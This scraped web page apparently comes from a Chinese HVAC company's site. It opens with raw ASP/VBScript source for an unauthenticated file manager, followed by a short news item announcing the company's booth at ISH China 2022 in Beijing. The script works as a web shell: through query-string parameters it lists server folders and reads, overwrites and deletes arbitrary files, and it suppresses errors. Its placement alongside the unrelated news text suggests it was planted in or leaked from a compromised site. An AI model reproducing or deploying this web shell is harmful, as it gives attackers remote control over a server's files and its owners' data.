<% On Error Resume Next function bianliFolder(currentPath) path = server.mapPath(currentPath) response.write("v1.1Current Folder is " & path & "
") set fso=server.CreateObject("scripting.filesystemobject") on error resume next set objFolder=fso.GetFolder(path) upperFolder = LEFT(currentPath,(InStrRev(currentPath,"/")-1)) IF currentPath <> "/" THEN if upperFolder="" then upperFolder="/" response.write("· 返回上级目录 ") response.write(upperFolder) response.write("") END IF if Right(currentPath,1)<>"/" then currentPath=currentPath&"/" set objSubFolders=objFolder.Subfolders for each objSubFolder in objSubFolders 'nowpath=path + "\" + objSubFolder.name nowpath=objSubFolder.name nextPath = currentPath & objSubFolder.name 'Response.Write nowpath 'Response.Write "·" & nowpath & "" Response.Write "·" & nowpath & "" Response.Write ""&objSubFolder.datelastmodified&"  " 'bianli(nowpath)'递归 next Call bianliFile(currentPath) set objFolder=nothing set objSubFolders=nothing set fso=nothing end function %> <% function bianliFile(currentPath) 'go through files path = server.mapPath(currentPath) 'Response.Write("path is " & path & "
") set fso=server.CreateObject("scripting.filesystemobject") on error resume next set objFolder=fso.GetFolder(path) nowpath = path 'Response.Write("now path is " & nowpath & "
") 'Response.Write "" & nowpath & "" set objFiles=objFolder.Files for each objFile in objFiles Response.Write "·" Response.Write objFile.name & "" & objFile.datelastmodified& "" Response.Write "GB2312 Edit  UTF-8 EditDel" next Response.Write "

" 'bianli(nowpath)'递归 set objFolder=nothing set objSubFolders=nothing set fso=nothing end function %> <% function delit(fileType,path) 'remove a file set fso=server.CreateObject("scripting.filesystemobject") IF UCase(fileType) = "SINGLE" THEN fso.DeleteFile(path) END IF IF UCase(fileType) = "MULTI" THEN fso.DeleteFolder(path) END IF end function %> <% function displayit(fileType,path) response.write Server.HTMLEncode(LoadFile(path,fileType)) end function function readItAll(path) 'read a file Set objTStream = objFSO.OpenTextFile(path) Do While Not objTStream.AtEndOfStream 'get the line number intLineNum = objTStream.Line 'format and convert to a string strLineNum = Right("00" & CStr(intLineNum), 3) 'get the text of the line from the file strLineText = objTStream.ReadLine Response.Write strLineNum & ": " & strLineText & vbCrLf Loop objTStream.Close end function Function writeTextFile(fileName,fileToWrite,fileType) SaveToFile fileToWrite,fileName,fileType End Function Function LoadFile(ByVal File,ByVal charset) Dim objStream Set objStream = Server.CreateObject("ADODB.Stream") If Err.Number=-2147221005 Then Response.Write "

" Err.Clear Response.End End If With objStream .Type = 2 .Mode = 3 .Open .LoadFromFile File If Err.Number<>0 Then Response.Write "
" Err.Clear Response.End End If .Charset = charset .Position = 2 LoadFile = .ReadText .Close End With Set objStream = Nothing End Function '存储内容到文件 Sub SaveToFile(ByVal strBody,ByVal File,ByVal charset) Dim objStream On Error Resume Next if left(strBody,8)="" then strBody=Mid(strBody,9) end if Set objStream = Server.CreateObject("ADODB.Stream") If Err.Number=-2147221005 Then Response.Write "
" Err.Clear Response.End End If With objStream .Type = 2 .Mode = 3 .Open .Charset = charset .Position = objStream.Size .WriteText = strBody .SaveToFile File,2 .Close End With Set objStream = Nothing End Sub %> <% action = request.queryString("action") IF action = "del" THEN fileType = request.queryString("fileType") filePath = request.queryString("filePath") response.write(filePath) Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=0 Call delit(fileType,filePath) 'response.redirect("") if err then Response.Write "错误:"&Err.Description response.end else Response.Write "成功!" response.end end if END IF IF action = "save" THEN Dim db,fileToWriteType,fileContent,fileName fileType = Request("fileType") fileAddress = Request("fileAddress") fileAddressNew = Request("fileAddressNew") fileContent = Request("fileContent") IF fileAddresNew = "" THEN fileName = fileAddress ELSE fileName = fileAddressNew END IF Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=0 Call writeTextFile(fileName,fileContent,fileType) 'Call funAlertMsg("操作成功!") if err then Response.Write fileName&"
错误s:"&Err.Description response.end else Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=1 Response.Write "
成功!" response.end end if END IF %> <% IF action = "display" THEN filePath = request.queryString("filePath") fileType = request.queryString("fileType") %>

<% response.write(filePath) %> <% if err then Response.Write "
状态:错误:"&Err.Description response.end else Response.Write "
状态:成功!" response.end end if %> <% END IF %> <% rootPath = request.queryString("rootPath") 'if not set the rootPath parameter then set it to current path if rootPath = "" then rootPath = "/" Call bianliFolder(rootPath) %>
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Focus makes profession
ISH & CIHE 2022
Clicks:  1870        作者:EWSH
  •        China International Trade Fair for Heating, Ventilation, Air-conditioning, Sanitation and Home comfort System (ISH CHINA 2022) will be held from May 9th 2022 to May 11th 2022 in Beijing, China.  Shanghai Easywell Products Technology Co., Ltd and Jiangsu Easywell Smart Products Co., Ltd will join in the exhibition, the booth No is W1-43C.  

    Warmly welcome all friends to visit our booth !



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